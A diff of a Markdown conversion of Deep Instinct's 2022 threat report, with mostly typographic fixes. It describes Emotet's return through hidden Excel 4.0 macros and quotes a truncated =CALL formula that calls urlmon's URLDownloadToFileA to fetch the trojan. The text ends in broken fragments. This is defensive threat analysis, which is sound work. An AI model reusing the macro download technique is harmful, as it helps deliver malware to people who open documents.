jacobdjwilson/awesome-annual-security-reports/Markdown Conversions/2022/Deep-Instinct-Cyber-Threat-Landscape-Report-2022.md

 findings of advanced obfuscation techniques, such as decoding the macro code in run\-time.
 While some of these techniques are known, most of them are newly discovered (unknown) threats.
 Our team also showcased how the Deep Instinct Prevention Platform can identify and prevent these new malicious XL4 strains using our Anomaly Detection algorithms.
-Even if this malware family evolves and modifies its techniques, Deep Instinct can autonomously predict and prevent these threats.
+Even if this malware family evolves and modifies its techniques, Deep Instinct can autonomously predict and prevent these threats’.
 When Emotet first emerged in 2014, it functioned mostly as a banking trojan used to exfiltrate financial data from its victims.
-Emotet evolved to allow operators to redesign the trojan to work mainly as a Dropper, a type of malware designed to deliver other malware to a victims computer.
+Emotet evolved to allow operators to redesign the trojan to work mainly as a Dropper, a type of malware designed to deliver other malware to a victim’s computer.
-Emotets abilities to evade security measures and move laterally by leveraging a server message block (SMB) exploit or brute forcing admin credentials has allowed it to become one of the most dangerous and dominant malware variants in the wild.
+Emotet’s abilities to evade security measures and move laterally by leveraging a server message block (SMB) exploit or brute forcing admin credentials has allowed it to become one of the most dangerous and dominant malware variants in the wild.
 Early in 2021, an international taskforce coordinated by Europol and Eurojust seized Emotet infrastructure, which included several hundred servers located across the world, and arrested some of its operators.
-These actions stopped Emotets operation for a time, but in November 2021 it re\-emerged with new variants of Emotet again spotted in the wild.
+These actions stopped Emotet’s operation for a time, but in November 2021 it re\-emerged with new variants of Emotet again spotted in the wild.
 These new variants utilize Excel 4\.0 macros for dropping and executing the Emotet malware.
-Emotet operators made sure to hide the sheets containing the obfuscated macros, so when a user opens the document, it wont appear suspicious.
+Emotet operators made sure to hide the sheets containing the obfuscated macros, so when a user opens the document, it won’t appear suspicious.
 In reality, as soon as the user enables macros, the hidden code will execute.
-Excel 4\.0 takes advantage of built\-in functions such as the Auto\-Open function, which had previously been used to automatically run a macro when opening a workbook, and then call Windows functions directly such as URLDownloadToFile to download and execute the Emotet trojan.
+Excel 4\.0 takes advantage of built\-in functions such as the “Auto\-Open” function, which had previously been used to automatically run a macro when opening a workbook, and then call Windows functions directly such as “URLDownloadToFile” to download and execute the Emotet trojan.
-Auto\_Open Excel 4\.0 function, taken from a malicious document Excel 4\.0 use of \=CALL to directly call a Windows function in order to download the Emotet trojan Excel 4\.0 Macros
+“Auto\_Open” Excel 4\.0 function, taken from a malicious document Excel 4\.0 use of “\=CALL” to directly call a Windows function in order to download the Emotet trojan Excel 4\.0 Macros
 Emotet
+§
+§
 EFEWF!$D$1
-\=CALL("urlmon"," URLDownloadToFileA","JJCCBB",0,"http:
+\=CALL("urlmon"," URLDownloadToFileA","JJCCBB",0,"http:/
-ada.
+/ada.
 .
 .
 .